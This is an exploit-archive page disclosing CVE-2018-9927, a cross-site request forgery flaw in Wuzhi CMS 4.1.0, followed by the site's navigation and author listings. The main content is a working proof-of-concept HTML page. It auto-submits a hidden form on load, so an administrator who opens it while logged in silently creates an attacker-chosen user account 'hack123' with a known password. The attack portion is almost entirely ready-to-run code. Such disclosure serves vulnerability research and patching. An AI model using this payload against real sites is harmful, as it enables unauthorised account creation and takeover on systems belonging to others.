Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery: Posted Apr 11, 2018; Authored by taoge; Wuzhi CMS version 4.1.0 suffers from an add user cross site request forgery vulnerability.; tags | exploit, csrf; advisories | CVE-2018-9927; SHA-256 | 71ec60a8f9d3e0e1eea31ddd84cd846e9afedc43c74333016232860bef79480e; Download | Favorite | View

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

# Exploit Title: WUZHI CMS 4.1.0 CSRF vulnerability add user account
# Date: 2018-04-10
# Exploit Author: taoge
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
# Software Link: https://github.com/wuzhicms/wuzhicms
# Version: 4.1.0 
# CVE : CVE-2018-9927
  
An issue was discovered in WUZHI CMS 4.1.0.i1/4https://github.com/wuzhicms/wuzhicms/issues/128i1/4
There is a CSRF vulnerability that can add a user account via index.php?m=member&f=index&v=add.
After the administrator logged in, open the csrf exp page.
  
  
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;
 
 
fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />";  
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />";  
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />";  
fields += "<input type='hidden' name='info[mobile]' value='' />";  
fields += "<input type='hidden' name='modelids[]' value='10' />";  
fields += "<input type='hidden' name='info[groupid]' value='3' />";  
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";  
fields += "<input type='hidden' name='avatar' value='' />";  
fields += "<input type='hidden' name='islock' value='0' />"; 
fields += "<input type='hidden' name='sys_name' value='0' />"; 
fields += "<input type='hidden' name='info[birthday]' value='' />";  
fields += "<input type='hidden' name='info[truename]' value='' />";  
fields += "<input type='hidden' name='info[sex]' value='0' />"; 
fields += "<input type='hidden' name='info[marriage]' value='0' />"; 
 
 
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=taoge";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

Top Authors In Last 30 Days

Red Hat 251 files
indoushka 155 files
Ubuntu 91 files
Gentoo 32 files
Debian 21 files
LiquidWorm 14 files
Apple 11 files
malvuln 8 files
Google Security Research 7 files
verylazytech 4 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,140)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,531)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,026)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,914)
UNIX (9,469)
UnixWare (188)
Windows (6,784)
Other

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

Share This

Wuzhi CMS 4.1.0 Add User Cross Site Request Forgery

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems